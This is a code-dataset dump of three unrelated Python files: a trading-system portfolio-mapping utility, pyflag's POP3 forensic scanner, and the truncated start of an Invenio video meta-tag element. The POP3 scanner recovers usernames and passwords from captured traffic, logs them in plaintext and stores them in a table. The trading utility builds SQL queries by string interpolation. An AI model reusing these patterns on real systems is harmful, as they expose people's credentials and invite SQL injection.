            return acm_pf.AdditionalInfo().MSSACC_OTC().strip()
    else:
        return ""
'''
def mapMssAccCode(prfid, insid):
    """Resolve the MSS account code configured on a portfolio for a
    given instrument.

    The additional-info attribute consulted depends on the instrument
    class: OTC -> MSSACC_OTC; Stock/Warrant -> MSSACC_STOCK;
    Future/Forward -> MSSACC_FUTURE_OPT; Option -> MSSACC_STOCK_OPT or
    MSSACC_FUTURE_OPT depending on the underlying.  Returns '' when the
    portfolio/instrument is unknown, the combination is unsupported, or
    the attribute is unset.
    """
    portfolio = acm.FPhysicalPortfolio[prfid]
    instrument = acm.FInstrument[insid]
    if portfolio is None or instrument is None:
        return ""
    addinfo = portfolio.AdditionalInfo()
    if instrument.Otc():
        value = addinfo.MSSACC_OTC()
    else:
        ins_type = instrument.InsType()
        if ins_type in ('Stock', 'Warrant'):
            value = addinfo.MSSACC_STOCK()
        elif ins_type == 'Future/Forward':
            value = addinfo.MSSACC_FUTURE_OPT()
        elif ins_type == 'Option':
            underlying_type = instrument.Underlying().InsType()
            if underlying_type == 'Stock':
                value = addinfo.MSSACC_STOCK_OPT()
            elif underlying_type == 'EquityIndex':
                value = addinfo.MSSACC_FUTURE_OPT()
            else:
                return ""
        else:
            return ""
    # Unset additional-info values come back as None.
    if value is not None:
        return value.strip()
    return ''
def mapMssAccCode_withshortsell(prfid, insid, short_sell):
    """Resolve the MSS account code for a portfolio/instrument pair,
    honouring the FO short-sell flag.

    Short-sell trades use the *_SHORT additional-info attributes,
    normal trades the MSSACC_* ones; the attribute family is selected
    by instrument class exactly as in mapMssAccCode().  Returns '' for
    unknown portfolio/instrument, unsupported combinations, or unset
    attributes.
    """
    is_short = IsShortSellTrade(short_sell)
    portfolio = acm.FPhysicalPortfolio[prfid]
    instrument = acm.FInstrument[insid]
    if portfolio is None or instrument is None:
        return ""
    addinfo = portfolio.AdditionalInfo()
    if instrument.Otc():
        value = addinfo.MSS_OTC_SHORT() if is_short else addinfo.MSSACC_OTC()
    else:
        ins_type = instrument.InsType()
        if ins_type in ('Stock', 'Warrant'):
            value = addinfo.MSS_STOCK_SHORT() if is_short else addinfo.MSSACC_STOCK()
        elif ins_type == 'Future/Forward':
            value = addinfo.MSS_FUT_OPT_SHORT() if is_short else addinfo.MSSACC_FUTURE_OPT()
        elif ins_type == 'Option':
            underlying_type = instrument.Underlying().InsType()
            if underlying_type == 'Stock':
                value = addinfo.MSS_STOCK_OPT_SHORT() if is_short else addinfo.MSSACC_STOCK_OPT()
            elif underlying_type == 'EquityIndex':
                value = addinfo.MSS_FUT_OPT_SHORT() if is_short else addinfo.MSSACC_FUTURE_OPT()
            else:
                return ""
        else:
            return ""
    # Unset additional-info values come back as None.
    return value.strip() if value is not None else ''
def mapAcquirerByPf(prfid, insid, short_sell):
    """Resolve the acquirer party id configured on portfolio *prfid* for
    instrument *insid*, honouring the short-sell flag.

    The portfolio additional-info field consulted (ACQUIRER_* for normal
    trades, ACQ_*_SHORT for short sells) is chosen by instrument class.
    Returns '' when the instrument is unknown or the combination is
    unsupported.

    Fixes: removed the unused local ``trdnbr``.
    """
    acm_ins = acm.FInstrument[insid]
    if acm_ins is None:
        return ""
    bool_short_sell = IsShortSellTrade(short_sell)
    acq_type = ''
    if acm_ins.Otc() == False:
        if acm_ins.InsType() in ('Stock', 'Warrant'):
            if bool_short_sell:
                acq_type = "ACQ_STOCK_SHORT"
            else:
                acq_type = "ACQUIRER_STOCK"
        elif acm_ins.InsType() == 'Future/Forward':
            if bool_short_sell:
                acq_type = "ACQ_FUT_OPT_SHORT"
            else:
                acq_type = "ACQUIRER_FUTURE_OPT"
        elif acm_ins.InsType() == 'Option':
            if acm_ins.Underlying().InsType() == 'Stock':
                if bool_short_sell:
                    acq_type = "ACQ_STOCK_OPT_SHORT"
                else:
                    acq_type = "ACQUIRER_STOCK_OPT"
            elif acm_ins.Underlying().InsType() == 'EquityIndex':
                if bool_short_sell:
                    acq_type = "ACQ_FUT_OPT_SHORT"
                else:
                    acq_type = "ACQUIRER_FUTURE_OPT"
            else:
                return ""
        else:
            return ""
    else:
        if bool_short_sell:
            acq_type = "ACQ_OTC_SHORT"
        else:
            acq_type = "ACQUIRER_OTC"
    acq_ptyid = ''
    strSql = """select ai.value
            from portfolio pf, additionalinfo ai, additionalinfospec ais
            where pf.prfnbr = ai.recaddr
            and ai.addinf_specnbr = ais.specnbr
            and ais.field_name = '%s'
            and pf.prfid = '%s'
            and ais.rec_type = 'Portfolio'""" % (acq_type, prfid)
    rs = ael.asql(strSql)
    columns, buf = rs
    # NOTE(review): the break only exits the inner (row) loop, so with
    # multiple result tables the first row of the LAST table wins.
    # Behaviour kept unchanged.
    for table in buf:
        for row in table:
            acq_ptyid = row[0].strip()
            break
    return acq_ptyid
def mapPfByMssAcc(trd_mss_acc, insid):
    """Find the portfolio whose MSSACC_* additional-info value equals
    *trd_mss_acc* for the instrument class of *insid*.

    The additional-info field searched (MSSACC_OTC / MSSACC_STOCK /
    MSSACC_FUTURE_OPT / MSSACC_STOCK_OPT) is selected by instrument
    class.  Returns '' when the instrument is unknown or no portfolio
    matches.

    Fixes: removed the unused local ``trdnbr``.
    """
    acm_ins = acm.FInstrument[insid]
    if acm_ins is None:
        return ""
    pf_type = ''
    if acm_ins.Otc() == False:
        if acm_ins.InsType() in ('Stock', 'Warrant'):
            pf_type = "MSSACC_STOCK"
        elif acm_ins.InsType() == 'Future/Forward':
            pf_type = "MSSACC_FUTURE_OPT"
        elif acm_ins.InsType() == 'Option':
            if acm_ins.Underlying().InsType() == 'Stock':
                pf_type = "MSSACC_STOCK_OPT"
            elif acm_ins.Underlying().InsType() == 'EquityIndex':
                pf_type = "MSSACC_FUTURE_OPT"
            else:
                return ""
        else:
            return ""
    else:
        pf_type = "MSSACC_OTC"
    prfid = ''
    strSql = """select pf.prfid
            from portfolio pf, additionalinfo ai, additionalinfospec ais
            where pf.prfnbr = ai.recaddr
            and ai.addinf_specnbr = ais.specnbr
            and ais.field_name = '%s'
            and ai.value = '%s'
            and ais.rec_type = 'Portfolio'""" % (pf_type, trd_mss_acc)
    rs = ael.asql(strSql)
    columns, buf = rs
    # NOTE(review): the break only exits the inner (row) loop, so with
    # multiple result tables the first row of the LAST table wins.
    # Behaviour kept unchanged.
    for table in buf:
        for row in table:
            prfid = row[0].strip()
            break
    return prfid
def mapPf(pf, addinfo_fieldname):
    """Map an upstream portfolio code to an FA portfolio id via the
    given portfolio additional-info field.

    The stored value may be a comma-separated list, hence the exact,
    leading and trailing LIKE matches.  Returns '' when nothing
    matches; with several matches the last row returned wins.
    """
    query = """select p.prfid
            from portfolio p, additionalinfo a, additionalinfospec s
            where p.prfnbr = a.recaddr
            and a.addinf_specnbr = s.specnbr
            and s.field_name = '%s'
            and s.rec_type = 'Portfolio'
            and (a.value = '%s' or a.value like '%s' or a.value like '%s')""" % (addinfo_fieldname, pf, pf+',%', '%,'+pf)
    columns, result_tables = ael.asql(query)
    matched_prfid = ''
    for result_table in result_tables:
        for result_row in result_table:
            matched_prfid = result_row[0]
    return matched_prfid
def getIssuerByWarrantName(warrant_name, addinfo_fieldname):
    """Resolve a warrant issuer party from the first two characters of
    the warrant name.

    The two-character issuer prefix is matched against the given party
    additional-info field.  Returns '' for names shorter than two
    characters or when no party matches.
    """
    if len(warrant_name) < 2:
        return ''
    query = """select p.ptyid
            from party p, additionalinfo a, additionalinfospec s
            where p.ptynbr = a.recaddr
            and a.addinf_specnbr = s.specnbr
            and s.field_name = '%s'
            and s.rec_type = 'Party'
            and a.value = '%s'""" % (addinfo_fieldname, warrant_name[:2])
    columns, result_tables = ael.asql(query)
    issuer_ptyid = ''
    for result_table in result_tables:
        for result_row in result_table:
            issuer_ptyid = result_row[0]
    return issuer_ptyid
def IsETF_from_Exchange(localcode):
    """Return True when *localcode* appears in the ETFTradingArrangement
    table, i.e. the stock code is an exchange-listed ETF.

    Fixes: removed the unused local ``DataTable`` and collapsed the
    redundant if/else around the EOF test.
    NOTE(review): *localcode* is interpolated straight into the SQL
    string - assumes exchange codes never contain quotes.
    """
    sqlstr = """SELECT stock_code FROM ETFTradingArrangement WHERE stock_code = '%s'""" % (localcode)
    result = HTI_DB_Functions.exec_sql_return_table(sqlstr, dsn, 'V', False)
    # EOF is set when the query returned no rows (normal stock);
    # the explicit comparison preserves the original truth value.
    return result.EOF == False
# NOTE(review): disabled draft helper - the def line is missing its ':'
# and the body references undefined names; inert because it is quoted out.
'''
def mapMSSAccAgainstHorizonPf(horizon_pf)
    strSql = """select a.value
            from portfolio p, additionalinfo a, additionalinfospec s
            where pf.prfnbr = a.recaddr
            and a.addinf_specnbr = s.specnbr
            and s.field_name = '%s'
            and s.rec_type = 'Portfolio'
            and a.value = '%s'""" % (addinfo_fieldname, warrant_name[0:2])
'''
def createStockOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
    """Create an OTC equity (stock) option instrument in Front Arena, or
    reuse an existing instrument with the same local code.

    The Horizon local code is used as the FA instrument name.  Returns
    the instrument id of the (new or existing) instrument.

    Fixes: removed the unused locals ``insUnderlyingInsType`` and
    ``prodId`` and the dead commented-out BB-ticker path.
    """
    # Reuse an existing instrument when the local code is already known.
    insid = getInsidByBBTicker(localcode)
    if insid != '':
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, '', 'OPTION', insUnderlying_mktId)
        return insid
    # Clone the generic option template and fill in the deal terms.
    ins_template = acm.FInstrument['Template Option']
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(localcode)
    ins_new.Underlying(ins_underlying_insid)
    ins_new.ExpiryDate(insMaturity)
    ins_new.Currency(insCcy)
    # Anything other than CALL/C is treated as a put.
    ins_new.IsCallOption(insOptionType.upper() in ('CALL', 'C'))
    # Anything other than EUROPEAN/E is treated as American.
    if insExecType.upper() in ('EUROPEAN', 'E'):
        ins_new.ExerciseType('European')
    else:
        ins_new.ExerciseType('American')
    # Anything other than CASH/C is treated as physical delivery.
    if insDeliveryType.upper() in ('CASH', 'C'):
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    ins_new.StrikeCurrency(insCcy)
    ins_new.StrikePrice(float(insStrike))
    ins_new.ContractSize(float(insPointValue))
    ins_new.ValuationGrpChlItem('OTC Equity Option')
    ins_new.Otc(True)
    ins_new.Commit()
    # Record the descriptive additional infos on the new instrument.
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, '', 'OPTION', insUnderlying_mktId)
    return ins_new.Name()
def createIndexOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
    """Create an OTC index option instrument in Front Arena, or reuse an
    existing instrument with the same local code.

    The template is selected from the underlying and point value via
    getIndexOptionTemplate(); when no template is found '' is returned.

    Fixes: removed the unused locals ``insUnderlyingInsType`` and
    ``prodId``.
    """
    # Reuse an existing instrument when the local code is already known.
    insid = getInsidByBBTicker(localcode)
    if insid != '':
        CreateInsAdditionalInfo(insid, "", insDesc, insName, "", 'OPTION', insUnderlying_mktId)
        return insid
    insTemplateId = getIndexOptionTemplate(ins_underlying_insid, insPointValue)
    if insTemplateId == '':
        return ''
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(localcode)
    ins_new.Underlying(ins_underlying_insid)
    ins_new.ExpiryDate(insMaturity)
    ins_new.Currency(insCcy)
    # Anything other than CALL/C is treated as a put.
    ins_new.IsCallOption(insOptionType.upper() in ('CALL', 'C'))
    # Anything other than EUROPEAN/E is treated as American.
    if insExecType.upper() in ('EUROPEAN', 'E'):
        ins_new.ExerciseType('European')
    else:
        ins_new.ExerciseType('American')
    # Anything other than CASH/C is treated as physical delivery.
    if insDeliveryType.upper() in ('CASH', 'C'):
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    ins_new.StrikeCurrency(insCcy)
    ins_new.StrikePrice(float(insStrike))
    ins_new.ContractSize(float(insPointValue))
    ins_new.ValuationGrpChlItem('OTC Index Option')
    ins_new.Otc(True)
    ins_new.Commit()
    # Record the descriptive additional infos on the new instrument.
    CreateInsAdditionalInfo(ins_new.Name(), "", insDesc, insName, "", 'OPTION', insUnderlying_mktId)
    return ins_new.Name()
def getInstrument_otc(tradeId, way, qty, price, insLocalCode,
                      trdCcy, insMic, insCcy, insDesc, insProdType,
                      insMaturity, insPointValue, insStrike, insOptionType,
                      insExecType, insBullBear, insBarrier, insOtc, insDeliveryType,
                      insUlLocalCode, insULProdType, insULMic, insULCcy, insULDesc,
                      trdChannel, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid,
                      insName, insULName, insUnderlying_mktId, warrantParity,
                      mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval,
                      fo_system, new_arr_ins, errdict):
    """Resolve (and create when necessary) the Front Arena instrument for
    an OTC trade.

    Only the 'OPTION' product type is handled here; any other product
    type falls through and returns ('', False).  The Horizon local code
    is used as the FA instrument name.  Newly created instrument ids
    (underlying and/or option) are appended to the mutable
    ``new_arr_ins`` list passed in by the caller.

    Returns (trd_insid, newIns): the resolved instrument id ('' when it
    could not be resolved) and True only when a brand-new option
    instrument was created.
    NOTE(review): many parameters (way, qty, price, barrier/bull-bear,
    mssd_*, errdict, ...) are unused in this OPTION-only code path -
    presumably kept for signature parity with sibling helpers; confirm.
    """
    newIns = False
    trd_insid = ''
    # Normalise the free-text classification fields before comparing.
    insProdType = insProdType.upper()
    insULProdType = insULProdType.upper()
    insOptionType = insOptionType.upper()
    insExecType = insExecType.upper()
    insBullBear = insBullBear.upper()
    insOtc = insOtc.upper()
    insDeliveryType = insDeliveryType.upper()
    if insProdType == 'OPTION':
        ins_insid = ''
        acm_ins = acm.FInstrument[insLocalCode] # use horizon local code as FA insid
        if acm_ins != None:
            ins_insid = acm_ins.Name()
        if ins_insid == '':
            # The option does not exist yet: resolve or create the underlying first.
            # get Underlying
            ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
            if ins_underlying_insid == '':
                if insULProdType == 'STOCK':
                    ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                elif insULProdType == 'INDEX':
                    # Index underlyings are never auto-created here.
                    ins_underlying_insid = ''
                    #ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                if ins_underlying_insid != '':
                    new_arr_ins.append(ins_underlying_insid)
            else:
                # Existing underlying: refresh its additional infos and BB ticker alias.
                acm_ins = acm.FInstrument[ins_underlying_insid]
                CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
                ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
                if ul_bb_ticker != '':
                    createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
            # Create Option
            if ins_underlying_insid != '':
                ins_new_insid = ''
                if insULProdType == 'STOCK':
                    ins_new_insid = createStockOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
                elif insULProdType == 'INDEX':
                    ins_new_insid = createIndexOptionInstr_otc(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
                if ins_new_insid != '':
                    trd_insid = ins_new_insid
                    new_arr_ins.append(ins_new_insid)
                    newIns = True
        else:
            # Option already exists: refresh additional infos and reuse it.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), "", insDesc, insName, "", insProdType, insUnderlying_mktId)
            trd_insid = ins_insid
            newIns = False
    return trd_insid, newIns
def IsShortSellTrade(short_sell):
    """Return True when the FO short-sell flag marks a short-sell trade.

    Both 'SHORT' and 'MARKET_MAKER' (case-insensitive) count as short
    sells; any other value - including '' - is a normal trade.
    """
    return short_sell.upper() in ('SHORT', 'MARKET_MAKER')
| frederick623/HTI | fa_util_py/HTI_FeedTrade_EDD_Util.py | Python | apache-2.0 | 114,684 |
""" This module implements features specific for POP Processing """
# Michael Cohen <scudette@users.sourceforge.net>
# Gavin Jackson <Gavz@users.sourceforge.net>
#
# ******************************************************
# Version: FLAG $Version: 0.87-pre1 Date: Thu Jun 12 00:48:38 EST 2008$
# ******************************************************
#
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# ******************************************************
import pyflag.conf
config=pyflag.conf.ConfObject()
from pyflag.Scanner import *
import pyflag.Scanner as Scanner
import pyflag.Time as Time
import re, posixpath
from NetworkScanner import *
config.add_option("POP3_PORTS", default='[110,]',
help="A list of ports to be considered for POP transactions")
class POPException(Exception):
    """ Raised when a line read from the stream is not a valid/implemented
    POP3 command, or a command handler fails while parsing it. """
class POP:
    """ Class managing the pop connection information.

    Command handler methods are named after the POP3 verb they handle
    (USER, PASS, RETR, ...) and are dispatched by name from parse();
    renaming a handler silently breaks dispatch.
    """
    def __init__(self,fd):
        ## File-like object the combined POP3 conversation is read from.
        self.fd=fd
        ## Fallback table for tokens without a handler method: server
        ## status lines (+OK/-ERR) and commands we deliberately ignore.
        self.dispatcher={
            "+OK" :self.NOOP,
            "-ERR" :self.NOOP,
            "DELE" :self.NOOP,
            "QUIT" :self.NOOP,
            }
        ## Credentials observed in this session (filled by USER/PASS).
        self.username=''
        self.password=''
        ## List of (message number, (offset, length)) for each message
        ## body seen in a successful TOP/RETR response.
        self.files=[]
    def read_multi_response(self):
        """ Reads the next few lines off fd and returns a combined response """
        result=''
        while 1:
            line = self.fd.readline()
            ## A lone '.' line terminates a POP3 multi-line response.
            if not line or line=='.\r\n':
                return result
            ## This cleans out escaped lines as mentioned in the RFC
            if line.startswith('.'): line=line[1:]
            result+=line
    def NOOP(self,args):
        """ A do nothing parser """
    def CAPA(self,args):
        ## We just ignore this (multi-line capability list).
        self.read_multi_response()
    def USER(self,args):
        ## Consume the server response line and record the username.
        response=self.fd.readline()
        self.username=args[0]
    def PASS(self,args):
        response=self.fd.readline()
        ## Only record the password if the server accepted the login.
        if response.startswith("+OK"):
            self.password=args[0]
            pyflaglog.log(pyflaglog.DEBUG,"Login for %s successful with password %s" % (self.username,self.password))
    def STAT(self,args):
        """ We ignore STAT commands """
        response=self.fd.readline()
    def LIST(self,args):
        """ We ignore LIST commands """
        self.read_multi_response()
    def UIDL(self,args):
        ## Multi-line response read and discarded.
        self.read_multi_response()
    #GJ: We _really_ needed to handle this command
    def TOP(self,args):
        """ Record the offset/length of a TOP'd message body in self.files. """
        ## Read the first line to see if it has been successful:
        response=self.fd.readline()
        if response.startswith("+OK"):
            start = self.fd.tell()
            data = self.read_multi_response()
            length = len(data)
            pyflaglog.log(pyflaglog.DEBUG,"Message %s starts at %s in stream and is %s long" % (args[0],start,length))
            self.files.append((args[0],(start,length)))
    def RETR(self,args):
        """ Record the offset/length of a retrieved message body in self.files. """
        ## Read the first line to see if it has been successful:
        response=self.fd.readline()
        if response.startswith("+OK"):
            start = self.fd.tell()
            data = self.read_multi_response()
            length = len(data)
            pyflaglog.log(pyflaglog.DEBUG,"Message %s starts at %s in stream and is %s long" % (args[0],start,length))
            self.files.append((args[0],(start,length)))
    def parse(self):
        """ Parse one line of the conversation.

        Returns the handled line, or 0 when an empty line (EOF) is read.
        Raises POPException for unknown commands or handler failures.
        """
        line = self.fd.readline().strip()
        if not line: return 0
        tmp = line.split(" ")
        command=tmp[0]
        args=tmp[1:]
        ## Dispatch the command handler:
        ## first a method of this class named exactly like the command,
        ## then the dispatcher table for tokens handled by NOOP.
        try:
            self.__class__.__dict__[command](self,args)
        except KeyError,e:
            try:
                self.dispatcher[command](args)
            except KeyError:
                raise POPException("POP: Command %r not implemented." % (command))
        except Exception,e:
            raise POPException("POP: Unable to parse line: %s." % (line))
        return line
class EmailTables(FlagFramework.EventHandler):
    """ Event handler that creates the case table used to store
    credentials recovered by the protocol scanners. """
    def create(self, dbh, case):
        ## This table stores common usernames/passwords:
        dbh.execute(
            """ CREATE TABLE if not exists `passwords` (
            `inode_id` INT,
            `username` VARCHAR(255) NOT NULL,
            `password` VARCHAR(255) NOT NULL,
            `type` VARCHAR(255) NOT NULL
            ) """)
class POPScanner(StreamScannerFactory):
    """ Collect information about POP transactions.

    Replays the combined request/response stream through the POP parser,
    publishes each retrieved message as a VFS node, rescans it (so the
    RFC2822 scanner can pick it up) and records any credentials seen.
    """
    default = True
    group = 'NetworkScanners'
    def process_stream(self, stream, factories):
        forward_stream, reverse_stream = self.stream_to_server(stream, "POP3")
        if not reverse_stream or not forward_stream: return
        ## Combined inode interleaves both directions of the TCP session.
        combined_inode = "I%s|S%s/%s" % (stream.fd.name, forward_stream,reverse_stream)
        pyflaglog.log(pyflaglog.DEBUG,"Openning %s for POP3" % combined_inode)
        ## We open the file and scan it for emails:
        fd = self.fsfd.open(inode=combined_inode)
        inode_id = 0
        p=POP(fd)
        ## Drive the parser until end of stream; parse errors on single
        ## lines are logged and parsing continues with the next line.
        while 1:
            try:
                if not p.parse():
                    break
            except POPException,e:
                pyflaglog.log(pyflaglog.DEBUG,"%s" % e)
        for f in p.files:
            ## Add a new VFS node
            offset, length = f[1]
            ## The message body is an offset/length slice of the combined stream.
            new_inode="%s|o%s:%s" % (combined_inode,offset, length)
            ds_timestamp = Time.convert(stream.ts_sec, case=self.case, evidence_tz="UTC")
            date_str = ds_timestamp.split(" ")[0]
            path, inode, inode_id = self.fsfd.lookup(inode=combined_inode)
            path=posixpath.normpath(path+"/../../../../../")
            inode_id = self.fsfd.VFSCreate(None,new_inode,
                                           "%s/POP/%s/Message_%s" % (path, date_str,
                                                                     f[0]),
                                           mtime=stream.ts_sec,
                                           size = length
                                           )
            ## Scan the new file using the scanner train. If
            ## the user chose the RFC2822 scanner, we will be
            ## able to understand this:
            self.scan_as_file(new_inode, factories)
        ## If there is any authentication information in here,
        ## we save it for Ron:
        dbh = DB.DBO(self.case)
        if p.username and p.password:
            ## NOTE(review): inode_id is the id of the LAST message node
            ## created above (or 0 when none) - confirm this is intended.
            dbh.execute("insert into passwords set inode_id=%r,username=%r,password=%r,type='POP3'",(
                inode_id, p.username, p.password))
    class Scan(StreamTypeScan):
        ## Streams with this magic mime type are routed to this scanner.
        types = [ "protocol/x-pop-request" ]
import pyflag.Magic as Magic
class POPRequstStream(Magic.Magic):
    """ Detect POP Request stream """
    type = "POP Request Stream"
    mime = "protocol/x-pop-request"
    default_score = 20
    regex_rules = [
        ## These are the most common pop commands - we look for at least 5 of them:
        ## Each rule is (pattern, offset range searched) - presumably
        ## (start, end) byte offsets per the Magic framework; confirm.
        ( "CAPA", (0,50)),
        ( "\nUSER ", (0,50)),
        ( "\nPASS ", (0,50)),
        ( "LIST\r\n", (0,50)),
        ( "UIDL\r\n", (0,50)),
        ( "RETR [0-9]+", (0,50)),
        ( "DELE [0-9]+", (0,50))
        ]
    ## (expected score, sample text) pairs used by the magic self-test.
    samples = [
        ( 100, \
"""CAPA
USER thadon
PASS password1
CAPA
LIST
UIDL
RETR 1
DELE 1
QUIT
""")]
class POPResponseStream(Magic.Magic):
    """ Detect POP Response stream """
    type = "POP Response Stream"
    mime = "protocol/x-pop-response"
    default_score = 20
    ## A server response stream is recognised purely by '+OK ' status
    ## lines near the start of the stream.
    regex_rules = [
        ( "\n.OK ", (0,500))
        ]
    ## (expected score, sample text) pair used by the magic self-test.
    samples = [
        ( 100, \
"""+OK POP3 mailhost.someisp1.com.au (Version 3.1e-3) http://surgemail.com
+OK Capability list follows
TOP
USER
UIDL
SURGEMAIL
.
+OK scudette@users.sourceforg.net nice to hear from you - password required
+OK scudette has 1 mail messages
+OK 1 30202
+OK 1 (30202)
""")]
## UnitTests:
import pyflag.tests as tests
import pyflag.pyflagsh as pyflagsh
from pyflag.FileSystem import DBFS
class POPTests(tests.ScannerTest):
    """ Tests POP Scanner """
    test_case = "PyFlagTestCase"
    test_file = "stdcapture_0.4.pcap.e01"
    subsystem = "EWF"
    fstype = "PCAP Filesystem"
    order = 21
    ## NOTE(review): the method name says SMTP but this exercises the
    ## POP scanner - likely copy/paste from a sibling test.
    def test01SMTPScanner(self):
        """ Test POP Scanner """
        env = pyflagsh.environment(case=self.test_case)
        pyflagsh.shell_execv(env=env,
                             command="scan",
                             argv=["*",                   ## Inodes (All)
                                   "POPScanner", "RFC2822",
                                   ])                   ## List of Scanners
        ## What should be there after the run: at least one POP3
        ## credential recovered into the passwords table.
        dbh = DB.DBO(self.test_case)
        dbh.execute("select count(*) as total from passwords where type='POP3'")
        row = dbh.fetch()
        self.failIf(row['total']==0,"Could not parse any POP3 passwords")
| backupManager/pyflag | src/plugins_old/NetworkForensics/ProtocolHandlers/POP.py | Python | gpl-2.0 | 9,518 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2013 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - return the video of a record"""
import cgi
from invenio.config import CFG_SITE_URL, CFG_SITE_SECURE_URL, CFG_CERN_SITE
from invenio.legacy.bibdocfile.api import BibRecDocs, get_superformat_from_format
from invenio.config import CFG_WEBSEARCH_ENABLE_OPENGRAPH
def format_element(bfo):
    """
    Return the video of the record, suitable for the Open Graph protocol.

    Emits og:video / og:image meta tags (plus secure_url variants when
    the secure URL differs) for every video-format bibdoc of the record;
    on CERN sites, additionally emits a Flash/MP4 player block and a
    Twitter player card built from the media archive URLs.

    Fixes: narrowed the bare ``except:`` (which also swallowed
    SystemExit/KeyboardInterrupt) to ``except Exception:`` and removed
    the dead initial ``tags = []`` assignment.
    """
    if not CFG_WEBSEARCH_ENABLE_OPENGRAPH:
        return ""
    bibarchive = BibRecDocs(bfo.recID)
    bibdocs = bibarchive.list_bibdocs()
    additional_tags = ""
    videos = []
    images = []
    for doc in bibdocs:
        found_icons = []
        # Despite the name, this holds the VIDEO file URL (.mp4/.webm/.ogv).
        found_image_url = ''
        for docfile in doc.list_latest_files():
            if docfile.is_icon():
                found_icons.append((docfile.get_size(), docfile.get_url()))
            elif get_superformat_from_format(docfile.get_format()).lower() in [".mp4", '.webm', '.ogv']:
                found_image_url = docfile.get_url()
        # Sort icons by size so tags are emitted smallest-first.
        found_icons.sort()
        for icon_size, icon_url in found_icons:
            images.append((icon_url, icon_url.replace(CFG_SITE_URL, CFG_SITE_SECURE_URL)))
        if found_image_url:
            videos.append((found_image_url, found_image_url.replace(CFG_SITE_URL, CFG_SITE_SECURE_URL)))
    if CFG_CERN_SITE:
        # CERN media archive URLs are rewritten to the streaming host.
        mp4_urls = [url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch') \
                    for url in bfo.fields('8567_u') if url.endswith('.mp4')]
        img_urls = [url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch') \
                    for url in bfo.fields('8567_u') if url.endswith('.jpg') or url.endswith('.png')]
        if mp4_urls:
            mp4_url = mp4_urls[0]
            # Player dimensions from the MARC 300__b aspect-ratio field.
            if "4/3" in bfo.field("300__b"):
                width = "640"
                height = "480"
            else:
                width = "640"
                height = "360"
            additional_tags += '''
<meta property="og:video" content="%(CFG_CERN_PLAYER_URL)s?file=%(mp4_url_relative)s&streamer=%(CFG_STREAMER_URL)s&provider=rtmp&stretching=exactfit&image=%(image_url)s" />
<meta property="og:video:height" content="%(height)s" />
<meta property="og:video:width" content="%(width)s" />
<meta property="og:video:type" content="application/x-shockwave-flash" />
<meta property="og:video" content="%(mp4_url)s" />
<meta property="og:video:type" content="video/mp4" />
<meta property="og:image" content="%(image_url)s" />
<meta name="twitter:player:height" content="%(height)s" />
<meta name="twitter:player:width" content="%(width)s" />
<link rel="image_src" href="%(image_url)s" />
<link rel="video_src" href="%(CFG_CERN_PLAYER_URL)s?file=%(mp4_url_relative)s&streamer=%(CFG_STREAMER_URL)s&provider=rtmp&stretching=exactfit&image=%(image_url)s"/>
''' % {'CFG_CERN_PLAYER_URL': "https://cds.cern.ch/mediaplayer.swf",
       'CFG_STREAMER_URL': "rtmp://wowza.cern.ch:1935/vod",
       'width': width,
       'height': height,
       'image_url': img_urls and img_urls[0] or '',
       'mp4_url': mp4_url.replace('http://mediaarchive.cern.ch', 'https://mediastream.cern.ch'),
       'mp4_url_relative': '/' + '/'.join(mp4_url.split('/')[4:])}
        try:
            from invenio.media_utils import generate_embedding_url
